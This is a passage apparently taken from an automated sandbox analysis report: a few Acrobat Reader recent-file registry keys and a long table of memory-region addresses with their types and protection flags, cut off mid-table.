HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
sFileAncestors
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
There are 22 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7FFC0FF25000
|
unkown
|
page read and write
|
||
7FFC11EE2000
|
unkown
|
page readonly
|
||
7FFC12915000
|
unkown
|
page read and write
|
||
20561760000
|
heap
|
page read and write
|
||
216AF878000
|
trusted library allocation
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
8FDE6FB000
|
stack
|
page read and write
|
||
77E3ABE000
|
stack
|
page read and write
|
||
20561DD2000
|
heap
|
page read and write
|
||
24AAE856000
|
heap
|
page read and write
|
||
205615F0000
|
heap
|
page read and write
|
||
28F304D0000
|
heap
|
page read and write
|
||
28F306E2000
|
heap
|
page read and write
|
||
242AB8AE000
|
heap
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
24AAE9BB000
|
heap
|
page read and write
|
||
22658202000
|
heap
|
page read and write
|
||
216AE731000
|
trusted library allocation
|
page read and write
|
||
7FFBABBA2000
|
trusted library allocation
|
page read and write
|
||
24AAE9E9000
|
heap
|
page read and write
|
||
205617E9000
|
heap
|
page read and write
|
||
7FFC21E11000
|
unkown
|
page execute read
|
||
216AF2AE000
|
trusted library allocation
|
page read and write
|
||
20561B70000
|
direct allocation
|
page read and write
|
||
24AAE794000
|
heap
|
page read and write
|
||
7FFC12F35000
|
unkown
|
page readonly
|
||
24AAE06D000
|
heap
|
page read and write
|
||
21CA3249000
|
trusted library allocation
|
page read and write
|
||
216C683F000
|
heap
|
page read and write
|
||
2B1B7C66000
|
heap
|
page read and write
|
||
2DF6D2CB000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
21CA2004000
|
trusted library allocation
|
page read and write
|
||
7FFC11F2E000
|
unkown
|
page readonly
|
||
24AAE030000
|
heap
|
page read and write
|
||
7FFBABCD0000
|
trusted library allocation
|
page read and write
|
||
24AAE20A000
|
heap
|
page read and write
|
||
24AAE063000
|
heap
|
page read and write
|
||
300B37F000
|
stack
|
page read and write
|
||
2055F982000
|
heap
|
page read and write
|
||
24AAE951000
|
heap
|
page read and write
|
||
216AC7E2000
|
heap
|
page read and write
|
||
7FFC12E80000
|
unkown
|
page readonly
|
||
24AAE08C000
|
heap
|
page read and write
|
||
D9308CD000
|
stack
|
page read and write
|
||
2B1B7C69000
|
heap
|
page read and write
|
||
F202AFF000
|
stack
|
page read and write
|
||
BEF1DFE000
|
stack
|
page read and write
|
||
7FFC12F76000
|
unkown
|
page readonly
|
||
7FFC12F6D000
|
unkown
|
page readonly
|
||
205621B0000
|
direct allocation
|
page read and write
|
||
216AF2C3000
|
trusted library allocation
|
page read and write
|
||
D930C0C000
|
stack
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
7FFBABB71000
|
trusted library allocation
|
page read and write
|
||
21CB9800000
|
trusted library allocation
|
page read and write
|
||
300B77E000
|
stack
|
page read and write
|
||
7FFBAB9C4000
|
trusted library allocation
|
page read and write
|
||
24AAE76D000
|
heap
|
page read and write
|
||
7FFC1EC80000
|
unkown
|
page readonly
|
||
24AAE21F000
|
heap
|
page read and write
|
||
7FFC12EA5000
|
unkown
|
page read and write
|
||
2B1B7C7A000
|
heap
|
page read and write
|
||
24AAE7DB000
|
heap
|
page read and write
|
||
216AF8C3000
|
trusted library allocation
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
7FFC0FA63000
|
unkown
|
page readonly
|
||
2833858E000
|
heap
|
page read and write
|
||
21CA2241000
|
trusted library allocation
|
page read and write
|
||
21CA2169000
|
trusted library allocation
|
page read and write
|
||
24AAE08A000
|
heap
|
page read and write
|
||
20561757000
|
heap
|
page read and write
|
||
7FFC12EC1000
|
unkown
|
page execute read
|
||
24AAE861000
|
heap
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
7FFC0FA89000
|
unkown
|
page readonly
|
||
21C9F72E000
|
heap
|
page read and write
|
||
2055F360000
|
direct allocation
|
page read and write
|
||
216AF7BC000
|
trusted library allocation
|
page read and write
|
||
2B1B7C5C000
|
heap
|
page read and write
|
||
7FFC12E96000
|
unkown
|
page readonly
|
||
216C6BF1000
|
heap
|
page read and write
|
||
EEFA7FE000
|
stack
|
page read and write
|
||
242AD200000
|
heap
|
page read and write
|
||
21CB97E0000
|
heap
|
page read and write
|
||
D930B0D000
|
stack
|
page read and write
|
||
7FFC1ED81000
|
unkown
|
page execute read
|
||
BEF137B000
|
stack
|
page read and write
|
||
20561716000
|
heap
|
page read and write
|
||
7FF6A42DC000
|
unkown
|
page write copy
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
20BEEC3A000
|
heap
|
page read and write
|
||
2055F2F0000
|
heap
|
page read and write
|
||
BEF1B7C000
|
stack
|
page read and write
|
||
21CA0FC0000
|
trusted library allocation
|
page read and write
|
||
24AAE010000
|
heap
|
page read and write
|
||
24AAE069000
|
heap
|
page read and write
|
||
2055F9A1000
|
heap
|
page read and write
|
||
7FFC12EB0000
|
unkown
|
page readonly
|
||
7FFC12EA4000
|
unkown
|
page readonly
|
||
283385E5000
|
heap
|
page read and write
|
||
7FFBABCC0000
|
trusted library allocation
|
page read and write
|
||
242AD204000
|
heap
|
page read and write
|
||
7FFBABD00000
|
trusted library allocation
|
page read and write
|
||
205617C7000
|
heap
|
page read and write
|
||
7FFC1ED73000
|
unkown
|
page readonly
|
||
21CA21FF000
|
trusted library allocation
|
page read and write
|
||
7FFBABC50000
|
trusted library allocation
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
216AE793000
|
trusted library allocation
|
page read and write
|
||
216C6BE2000
|
heap
|
page read and write
|
||
7FFBABBB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC1ED97000
|
unkown
|
page readonly
|
||
28338429000
|
heap
|
page read and write
|
||
BCF067F000
|
stack
|
page read and write
|
||
7FF79BF25000
|
unkown
|
page readonly
|
||
7FFC12F50000
|
unkown
|
page readonly
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
D5AF4F9000
|
stack
|
page read and write
|
||
24AAE08C000
|
heap
|
page read and write
|
||
2B1B7C83000
|
heap
|
page read and write
|
||
24AAE278000
|
heap
|
page read and write
|
||
216C6A00000
|
trusted library allocation
|
page read and write
|
||
216AF683000
|
trusted library allocation
|
page read and write
|
||
7FFBAB993000
|
trusted library allocation
|
page read and write
|
||
FA07EF8000
|
stack
|
page read and write
|
||
7FFC11E81000
|
unkown
|
page execute read
|
||
21C9F74C000
|
heap
|
page read and write
|
||
F2028FE000
|
stack
|
page read and write
|
||
21CB97F0000
|
trusted library allocation
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
77E37FD000
|
stack
|
page read and write
|
||
7FFBABC10000
|
trusted library allocation
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
24AAE1C7000
|
heap
|
page read and write
|
||
7FFC12EF3000
|
unkown
|
page readonly
|
||
D92FA7A000
|
stack
|
page read and write
|
||
21C9F610000
|
heap
|
page read and write
|
||
2055F982000
|
heap
|
page read and write
|
||
24AAE733000
|
heap
|
page read and write
|
||
21CB9820000
|
remote allocation
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
28F30613000
|
heap
|
page read and write
|
||
28338494000
|
heap
|
page read and write
|
||
22289402000
|
trusted library allocation
|
page read and write
|
||
24AAE07A000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
216AF5F1000
|
trusted library allocation
|
page read and write
|
||
7FFBABC30000
|
trusted library allocation
|
page read and write
|
||
7FFC12E41000
|
unkown
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
D5AF5FC000
|
stack
|
page read and write
|
||
7FFC12E50000
|
unkown
|
page readonly
|
||
24AAE1C4000
|
heap
|
page read and write
|
||
2B1B7C00000
|
heap
|
page read and write
|
||
216AF66E000
|
trusted library allocation
|
page read and write
|
||
216AF849000
|
trusted library allocation
|
page read and write
|
||
22658302000
|
heap
|
page read and write
|
||
216AF70C000
|
trusted library allocation
|
page read and write
|
||
21CA30D5000
|
trusted library allocation
|
page read and write
|
||
216C68C2000
|
heap
|
page read and write
|
||
24AB34A2000
|
trusted library allocation
|
page read and write
|
||
24AAE09B000
|
heap
|
page read and write
|
||
205613F0000
|
direct allocation
|
page read and write
|
||
9ACDAFF000
|
stack
|
page read and write
|
||
7FFC0FF08000
|
unkown
|
page write copy
|
||
24AAE856000
|
heap
|
page read and write
|
||
F202DFE000
|
stack
|
page read and write
|
||
2B1B7C62000
|
heap
|
page read and write
|
||
7FFC0FD44000
|
unkown
|
page readonly
|
||
F202CFF000
|
stack
|
page read and write
|
||
24AAE880000
|
heap
|
page read and write
|
||
2055F33F000
|
heap
|
page read and write
|
||
216AF7C2000
|
trusted library allocation
|
page read and write
|
||
24AAE864000
|
heap
|
page read and write
|
||
24AAE957000
|
heap
|
page read and write
|
||
21CA1481000
|
trusted library allocation
|
page read and write
|
||
24AAD680000
|
heap
|
page read and write
|
||
21CB98E2000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
24AAE013000
|
heap
|
page read and write
|
||
24AAE083000
|
heap
|
page read and write
|
||
21CA30E2000
|
trusted library allocation
|
page read and write
|
||
24AAE083000
|
heap
|
page read and write
|
||
7FF6A42B0000
|
unkown
|
page readonly
|
||
D93084E000
|
stack
|
page read and write
|
||
216C67E5000
|
heap
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
1D34BE79000
|
heap
|
page read and write
|
||
216C685A000
|
heap
|
page read and write
|
||
21CB968D000
|
heap
|
page read and write
|
||
7FFC13010000
|
unkown
|
page readonly
|
||
216AF5F4000
|
trusted library allocation
|
page read and write
|
||
21CA1440000
|
heap
|
page execute and read and write
|
||
7FFBAB98D000
|
trusted library allocation
|
page execute and read and write
|
||
216AF686000
|
trusted library allocation
|
page read and write
|
||
7FFC12081000
|
unkown
|
page execute read
|
||
216C6824000
|
heap
|
page read and write
|
||
24AAE27E000
|
heap
|
page read and write
|
||
216C6BFE000
|
heap
|
page read and write
|
||
22658110000
|
trusted library allocation
|
page read and write
|
||
216AE701000
|
trusted library allocation
|
page read and write
|
||
7FFBABB90000
|
trusted library allocation
|
page read and write
|
||
7FF79BBC1000
|
unkown
|
page execute read
|
||
2055FA30000
|
direct allocation
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
2055F7B0000
|
direct allocation
|
page read and write
|
||
205617B6000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
21CB9814000
|
trusted library allocation
|
page read and write
|
||
7FFC0F7C1000
|
unkown
|
page execute read
|
||
7FFC0FE39000
|
unkown
|
page readonly
|
||
24AAE073000
|
heap
|
page read and write
|
||
24AAE794000
|
heap
|
page read and write
|
||
24AAE99E000
|
heap
|
page read and write
|
||
24AAE04F000
|
heap
|
page read and write
|
||
7FFC0F771000
|
unkown
|
page readonly
|
||
216C6889000
|
heap
|
page read and write
|
||
2055FBA0000
|
direct allocation
|
page read and write
|
||
216AF7AA000
|
trusted library allocation
|
page read and write
|
||
24AAE20F000
|
heap
|
page read and write
|
||
24AAE083000
|
heap
|
page read and write
|
||
77E387D000
|
stack
|
page read and write
|
||
24AAE9A4000
|
heap
|
page read and write
|
||
216C6BEF000
|
heap
|
page read and write
|
||
24AAE8B1000
|
heap
|
page read and write
|
||
24AAE831000
|
heap
|
page read and write
|
||
7FFC12EE4000
|
unkown
|
page read and write
|
||
7FF6A42B1000
|
unkown
|
page execute read
|
||
21C9F772000
|
heap
|
page read and write
|
||
216AF7B0000
|
trusted library allocation
|
page read and write
|
||
216AF5EB000
|
trusted library allocation
|
page read and write
|
||
216AE710000
|
trusted library allocation
|
page read and write
|
||
2055F300000
|
heap
|
page read and write
|
||
24AAE927000
|
heap
|
page read and write
|
||
D92FAF7000
|
stack
|
page read and write
|
||
28F30666000
|
heap
|
page read and write
|
||
216BE740000
|
trusted library allocation
|
page read and write
|
||
216C6837000
|
heap
|
page read and write
|
||
24AAE831000
|
heap
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
23F98602000
|
trusted library allocation
|
page read and write
|
||
24AAE7F8000
|
heap
|
page read and write
|
||
2DF6D314000
|
heap
|
page read and write
|
||
24AAEF20000
|
trusted library allocation
|
page read and write
|
||
2056165E000
|
heap
|
page read and write
|
||
28F306EA000
|
heap
|
page read and write
|
||
2B1B72E000
|
stack
|
page read and write
|
||
205617C7000
|
heap
|
page read and write
|
||
2265825B000
|
heap
|
page read and write
|
||
216C6854000
|
heap
|
page read and write
|
||
8FDEDFE000
|
stack
|
page read and write
|
||
24AAE75C000
|
heap
|
page read and write
|
||
7FFC120A4000
|
unkown
|
page readonly
|
||
24AAE880000
|
heap
|
page read and write
|
||
24AAE072000
|
heap
|
page read and write
|
||
216BE731000
|
trusted library allocation
|
page read and write
|
||
216AC84F000
|
heap
|
page read and write
|
||
2B1B7C5E000
|
heap
|
page read and write
|
||
21CA21EA000
|
trusted library allocation
|
page read and write
|
||
21CA223F000
|
trusted library allocation
|
page read and write
|
||
77E3D3B000
|
stack
|
page read and write
|
||
28338DC7000
|
heap
|
page read and write
|
||
216C6BA7000
|
heap
|
page read and write
|
||
22288BE0000
|
heap
|
page read and write
|
||
20BEF402000
|
trusted library allocation
|
page read and write
|
||
7FFC1E0B1000
|
unkown
|
page execute read
|
||
22657FB0000
|
heap
|
page read and write
|
||
216B015F000
|
trusted library allocation
|
page read and write
|
||
216AE1B0000
|
heap
|
page read and write
|
||
2055F210000
|
heap
|
page read and write
|
||
24AAE9C5000
|
heap
|
page read and write
|
||
22288C29000
|
heap
|
page read and write
|
||
7FFC12072000
|
unkown
|
page readonly
|
||
2B1B7C74000
|
heap
|
page read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
216AF866000
|
trusted library allocation
|
page read and write
|
||
216AF67D000
|
trusted library allocation
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
21CA2196000
|
trusted library allocation
|
page read and write
|
||
216AF89C000
|
trusted library allocation
|
page read and write
|
||
28338210000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
BCF0779000
|
stack
|
page read and write
|
||
24AAE08B000
|
heap
|
page read and write
|
||
216AF7B3000
|
trusted library allocation
|
page read and write
|
||
7FFC12EA6000
|
unkown
|
page readonly
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
7FFC11FA0000
|
unkown
|
page readonly
|
||
1D34BE57000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
7FFBABBB5000
|
trusted library allocation
|
page read and write
|
||
7FFBABB7D000
|
trusted library allocation
|
page read and write
|
||
24AAE75F000
|
heap
|
page read and write
|
||
2DF6D2D0000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
8EB9F7A000
|
stack
|
page read and write
|
||
216AE704000
|
trusted library allocation
|
page read and write
|
||
20561736000
|
heap
|
page read and write
|
||
77E3CBF000
|
stack
|
page read and write
|
||
21C9F6D0000
|
trusted library allocation
|
page read and write
|
||
1D34BE24000
|
heap
|
page read and write
|
||
24AAE06A000
|
heap
|
page read and write
|
||
D92FC7E000
|
stack
|
page read and write
|
||
BCF087F000
|
stack
|
page read and write
|
||
24AAE9C3000
|
heap
|
page read and write
|
||
7FFC0FF50000
|
unkown
|
page readonly
|
||
7FFC12F25000
|
unkown
|
page read and write
|
||
24AAE20A000
|
heap
|
page read and write
|
||
D5AF8FE000
|
stack
|
page read and write
|
||
7FFC21E12000
|
unkown
|
page readonly
|
||
24AAE9EA000
|
heap
|
page read and write
|
||
7FFC12ED0000
|
unkown
|
page readonly
|
||
23F97E02000
|
heap
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
8FDECFF000
|
stack
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
1D34BD10000
|
heap
|
page read and write
|
||
7FFC0FF29000
|
unkown
|
page read and write
|
||
7FFC12EB5000
|
unkown
|
page readonly
|
||
216AF66B000
|
trusted library allocation
|
page read and write
|
||
21CB9813000
|
trusted library allocation
|
page read and write
|
||
21CA2247000
|
trusted library allocation
|
page read and write
|
||
205617C7000
|
heap
|
page read and write
|
||
24AAE04F000
|
heap
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
216C68AB000
|
heap
|
page read and write
|
||
20562270000
|
direct allocation
|
page read and write
|
||
216C688D000
|
heap
|
page read and write
|
||
7DF47FDA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFC12ED1000
|
unkown
|
page execute read
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
242AB5CA000
|
heap
|
page read and write
|
||
D92F8FE000
|
stack
|
page read and write
|
||
216AF889000
|
trusted library allocation
|
page read and write
|
||
77E39FE000
|
stack
|
page read and write
|
||
24AAE180000
|
remote allocation
|
page read and write
|
||
8FDE8FE000
|
stack
|
page read and write
|
||
FA084FB000
|
stack
|
page read and write
|
||
20561390000
|
direct allocation
|
page read and write
|
||
23F98550000
|
remote allocation
|
page read and write
|
||
24AAE9CF000
|
heap
|
page read and write
|
||
2B1ADBE000
|
stack
|
page read and write
|
||
24AAE08C000
|
heap
|
page read and write
|
||
216AE5D7000
|
heap
|
page read and write
|
||
24AAE07F000
|
heap
|
page read and write
|
||
2055F9C2000
|
heap
|
page read and write
|
||
216C68D8000
|
heap
|
page read and write
|
||
242AB64D000
|
heap
|
page read and write
|
||
7FFBABB74000
|
trusted library allocation
|
page read and write
|
||
2055F953000
|
heap
|
page read and write
|
||
7FFC120D1000
|
unkown
|
page readonly
|
||
21C9F4B0000
|
heap
|
page read and write
|
||
7FFC12EF0000
|
unkown
|
page readonly
|
||
205617DA000
|
heap
|
page read and write
|
||
216AF70F000
|
trusted library allocation
|
page read and write
|
||
20561760000
|
heap
|
page read and write
|
||
242AB638000
|
heap
|
page read and write
|
||
24AAE8CB000
|
heap
|
page read and write
|
||
7FFC12E51000
|
unkown
|
page execute read
|
||
300B67C000
|
stack
|
page read and write
|
||
7FFC13011000
|
unkown
|
page execute read
|
||
21CB95E9000
|
heap
|
page read and write
|
||
24AAE1E6000
|
heap
|
page read and write
|
||
F20297E000
|
stack
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
24AAE95D000
|
heap
|
page read and write
|
||
205617F0000
|
direct allocation
|
page read and write
|
||
8FDE7FD000
|
stack
|
page read and write
|
||
24AAE9B5000
|
heap
|
page read and write
|
||
D5AF3FE000
|
stack
|
page read and write
|
||
20BEEBF0000
|
trusted library allocation
|
page read and write
|
||
24AAE9B8000
|
heap
|
page read and write
|
||
2DF6D450000
|
heap
|
page read and write
|
||
2833842C000
|
heap
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
216C6BE3000
|
heap
|
page read and write
|
||
216AF68F000
|
trusted library allocation
|
page read and write
|
||
2B1B7B50000
|
heap
|
page read and write
|
||
24AAE72E000
|
heap
|
page read and write
|
||
300ACCB000
|
stack
|
page read and write
|
||
7FFC12E39000
|
unkown
|
page readonly
|
||
2DF6ECC4000
|
heap
|
page read and write
|
||
24AAE9E4000
|
heap
|
page read and write
|
||
216C67C0000
|
trusted library allocation
|
page read and write
|
||
24AAE962000
|
heap
|
page read and write
|
||
242AB63B000
|
heap
|
page read and write
|
||
8EB9E79000
|
stack
|
page read and write
|
||
2055F460000
|
heap
|
page read and write
|
||
216B03B9000
|
trusted library allocation
|
page read and write
|
||
7FFC12042000
|
unkown
|
page execute read
|
||
216C68B8000
|
heap
|
page read and write
|
||
2055F952000
|
heap
|
page read and write
|
||
216AC7A3000
|
heap
|
page read and write
|
||
24AAE9CB000
|
heap
|
page read and write
|
||
216B03AA000
|
trusted library allocation
|
page read and write
|
||
24AAE929000
|
heap
|
page read and write
|
||
216AF68C000
|
trusted library allocation
|
page read and write
|
||
7FFC0FAAE000
|
unkown
|
page readonly
|
||
242AB789000
|
heap
|
page read and write
|
||
7FFC11FD1000
|
unkown
|
page execute read
|
||
7FFBAB9D0000
|
trusted library allocation
|
page read and write
|
||
22658130000
|
trusted library allocation
|
page read and write
|
||
28338E02000
|
heap
|
page read and write
|
||
205622B0000
|
direct allocation
|
page read and write
|
||
216AF8CF000
|
trusted library allocation
|
page read and write
|
||
EEFAC7D000
|
stack
|
page read and write
|
||
24AAE093000
|
heap
|
page read and write
|
||
24AAE04F000
|
heap
|
page read and write
|
||
24AAE91E000
|
heap
|
page read and write
|
||
7FFC12F75000
|
unkown
|
page read and write
|
||
7FFC12F30000
|
unkown
|
page readonly
|
||
24AAE7D2000
|
heap
|
page read and write
|
||
24AAE27E000
|
heap
|
page read and write
|
||
7FFC12EE5000
|
unkown
|
page readonly
|
||
22658265000
|
heap
|
page read and write
|
||
7FFC0FF23000
|
unkown
|
page write copy
|
||
7FFC12EC3000
|
unkown
|
page readonly
|
||
216C6BC3000
|
heap
|
page read and write
|
||
216C6813000
|
heap
|
page read and write
|
||
2056166B000
|
heap
|
page read and write
|
||
21CB1490000
|
trusted library allocation
|
page read and write
|
||
2055F9B8000
|
heap
|
page read and write
|
||
24AAE9CD000
|
heap
|
page read and write
|
||
2DF6D1E0000
|
heap
|
page read and write
|
||
7FFC0F641000
|
unkown
|
page execute read
|
||
21CB9881000
|
heap
|
page read and write
|
||
20561675000
|
heap
|
page read and write
|
||
2B1B7BF0000
|
trusted library allocation
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
216C6D90000
|
heap
|
page read and write
|
||
7FFBABB3D000
|
trusted library allocation
|
page read and write
|
||
2DF6ECA4000
|
heap
|
page read and write
|
||
8FDE29B000
|
stack
|
page read and write
|
||
1D34BF00000
|
heap
|
page read and write
|
||
7FFBABB50000
|
trusted library allocation
|
page execute and read and write
|
||
7FFBABC20000
|
trusted library allocation
|
page read and write
|
||
216AF689000
|
trusted library allocation
|
page read and write
|
||
216B01B7000
|
trusted library allocation
|
page read and write
|
||
7FFBABB78000
|
trusted library allocation
|
page read and write
|
||
24AAE721000
|
heap
|
page read and write
|
||
24AAE180000
|
heap
|
page read and write
|
||
216AE500000
|
trusted library allocation
|
page read and write
|
||
7FFC1EC81000
|
unkown
|
page execute read
|
||
7FFC1209D000
|
unkown
|
page read and write
|
||
8FDEAFD000
|
stack
|
page read and write
|
||
21C9F6F0000
|
heap
|
page read and write
|
||
242AB590000
|
heap
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
24AAE274000
|
heap
|
page read and write
|
||
216C6BDF000
|
heap
|
page read and write
|
||
8EB9CFF000
|
stack
|
page read and write
|
||
7FFC12FE3000
|
unkown
|
page readonly
|
||
22658284000
|
heap
|
page read and write
|
||
20561BB0000
|
direct allocation
|
page read and write
|
||
24AAE8B7000
|
heap
|
page read and write
|
||
242AB5A4000
|
heap
|
page read and write
|
||
7FF6A42D0000
|
unkown
|
page readonly
|
||
7FFC12F26000
|
unkown
|
page readonly
|
||
2055F9C0000
|
heap
|
page read and write
|
||
24AAE8B1000
|
heap
|
page read and write
|
||
24AAE063000
|
heap
|
page read and write
|
||
21CA2249000
|
trusted library allocation
|
page read and write
|
||
7FFC12F17000
|
unkown
|
page readonly
|
||
28F30460000
|
heap
|
page read and write
|
||
7FFC12EE1000
|
unkown
|
page execute read
|
||
216AF8C0000
|
trusted library allocation
|
page read and write
|
||
216C6895000
|
heap
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
24AAE9DE000
|
heap
|
page read and write
|
||
20BEEC49000
|
heap
|
page read and write
|
||
21CB9810000
|
trusted library allocation
|
page read and write
|
||
28F306D0000
|
heap
|
page read and write
|
||
21CB9483000
|
heap
|
page read and write
|
||
216AF7B6000
|
trusted library allocation
|
page read and write
|
||
21CB9607000
|
heap
|
page read and write
|
||
7FFC12079000
|
unkown
|
page readonly
|
||
216AF8D2000
|
trusted library allocation
|
page read and write
|
||
7FFBABAA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF79BBC0000
|
unkown
|
page readonly
|
||
28338D00000
|
heap
|
page read and write
|
||
24AAE8EF000
|
heap
|
page read and write
|
||
24AAE9F3000
|
heap
|
page read and write
|
||
2DF6D319000
|
heap
|
page read and write
|
||
216AC768000
|
heap
|
page read and write
|
||
24AAE8C8000
|
heap
|
page read and write
|
||
205617D2000
|
heap
|
page read and write
|
||
9ACD9FF000
|
stack
|
page read and write
|
||
D92F9FE000
|
stack
|
page read and write
|
||
28F3068B000
|
heap
|
page read and write
|
||
7FFC12ED2000
|
unkown
|
page readonly
|
||
2DF6D314000
|
heap
|
page read and write
|
||
2B1B7C3B000
|
heap
|
page read and write
|
||
7FFC12FE4000
|
unkown
|
page read and write
|
||
216AF7A1000
|
trusted library allocation
|
page read and write
|
||
205620E0000
|
direct allocation
|
page read and write
|
||
24AAE93F000
|
heap
|
page read and write
|
||
242AB600000
|
heap
|
page read and write
|
||
24AAEF25000
|
trusted library allocation
|
page read and write
|
||
2DF6D2A1000
|
heap
|
page read and write
|
||
216C68DD000
|
heap
|
page read and write
|
||
28338DBC000
|
heap
|
page read and write
|
||
7FFC13021000
|
unkown
|
page readonly
|
||
7FFC11FA3000
|
unkown
|
page readonly
|
||
20561720000
|
heap
|
page read and write
|
||
7FFC12E6B000
|
unkown
|
page read and write
|
||
7FFC11F8B000
|
unkown
|
page readonly
|
||
7FFC11E86000
|
unkown
|
page readonly
|
||
7FFC12EB1000
|
unkown
|
page execute read
|
||
24AAE180000
|
remote allocation
|
page read and write
|
||
8FDF0FF000
|
stack
|
page read and write
|
||
21CA2FD3000
|
trusted library allocation
|
page read and write
|
||
7FFC120B0000
|
unkown
|
page readonly
|
||
21CA2166000
|
trusted library allocation
|
page read and write
|
||
216AF83D000
|
trusted library allocation
|
page read and write
|
||
24AAE77F000
|
heap
|
page read and write
|
||
20BEEC00000
|
heap
|
page read and write
|
||
24AAE7F8000
|
heap
|
page read and write
|
||
24AAE9C9000
|
heap
|
page read and write
|
||
21C9F7AC000
|
heap
|
page read and write
|
||
20561D42000
|
heap
|
page read and write
|
||
24AAE9D1000
|
heap
|
page read and write
|
||
7FFBAB9C0000
|
trusted library allocation
|
page read and write
|
||
7FFBABC40000
|
trusted library allocation
|
page read and write
|
||
28338443000
|
heap
|
page read and write
|
||
24AAE9EF000
|
heap
|
page read and write
|
||
24AAE197000
|
heap
|
page read and write
|
||
216C68C9000
|
heap
|
page read and write
|
||
7FFC11E72000
|
unkown
|
page read and write
|
||
7FFC12F11000
|
unkown
|
page execute read
|
||
24AAE956000
|
heap
|
page read and write
|
||
7FFC1E0B0000
|
unkown
|
page readonly
|
||
7FFC1ED70000
|
unkown
|
page readonly
|
||
21CB988E000
|
heap
|
page read and write
|
||
28F30470000
|
heap
|
page read and write
|
||
216AF8CC000
|
trusted library allocation
|
page read and write
|
||
205621F0000
|
direct allocation
|
page read and write
|
||
216C68C8000
|
heap
|
page read and write
|
||
20561B30000
|
direct allocation
|
page read and write
|
||
7FFBABA40000
|
trusted library allocation
|
page execute and read and write
|
||
21CA220B000
|
trusted library allocation
|
page read and write
|
||
24AAE99F000
|
heap
|
page read and write
|
||
BEF1FFF000
|
stack
|
page read and write
|
||
20561757000
|
heap
|
page read and write
|
||
242AB540000
|
heap
|
page read and write
|
||
7FFC0FB11000
|
unkown
|
page execute read
|
||
20562170000
|
direct allocation
|
page read and write
|
||
216AC84D000
|
heap
|
page read and write
|
||
216C68A3000
|
heap
|
page read and write
|
||
7FFC11FB8000
|
unkown
|
page readonly
|
||
7FFC23C59000
|
unkown
|
page readonly
|
||
7FFBABA66000
|
trusted library allocation
|
page execute and read and write
|
||
20561950000
|
direct allocation
|
page read and write
|
||
7FFC12EB3000
|
unkown
|
page readonly
|
||
D92F6FE000
|
stack
|
page read and write
|
||
216AF7AD000
|
trusted library allocation
|
page read and write
|
||
216AC730000
|
heap
|
page read and write
|
||
8FDE9FF000
|
stack
|
page read and write
|
||
77E377F000
|
stack
|
page read and write
|
||
7FF79BF25000
|
unkown
|
page readonly
|
||
205617C1000
|
heap
|
page read and write
|
||
24AAE751000
|
heap
|
page read and write
|
||
7FFC12FFE000
|
unkown
|
page readonly
|
||
7FFC1EC85000
|
unkown
|
page readonly
|
||
2055F420000
|
direct allocation
|
page read and write
|
||
7FFC0F825000
|
unkown
|
page execute read
|
||
24AAE755000
|
heap
|
page read and write
|
||
7FFC0FF0C000
|
unkown
|
page write copy
|
||
216AF8C9000
|
trusted library allocation
|
page read and write
|
||
242AD170000
|
heap
|
page read and write
|
||
205616F5000
|
heap
|
page read and write
|
||
24AAE9C3000
|
heap
|
page read and write
|
||
7FFC12ED4000
|
unkown
|
page readonly
|
||
23F98550000
|
remote allocation
|
page read and write
|
||
24AAE0A8000
|
heap
|
page read and write
|
||
24AAE08A000
|
heap
|
page read and write
|
||
21CB97C0000
|
heap
|
page execute and read and write
|
||
21CB98B4000
|
heap
|
page read and write
|
||
7FFC0FDF6000
|
unkown
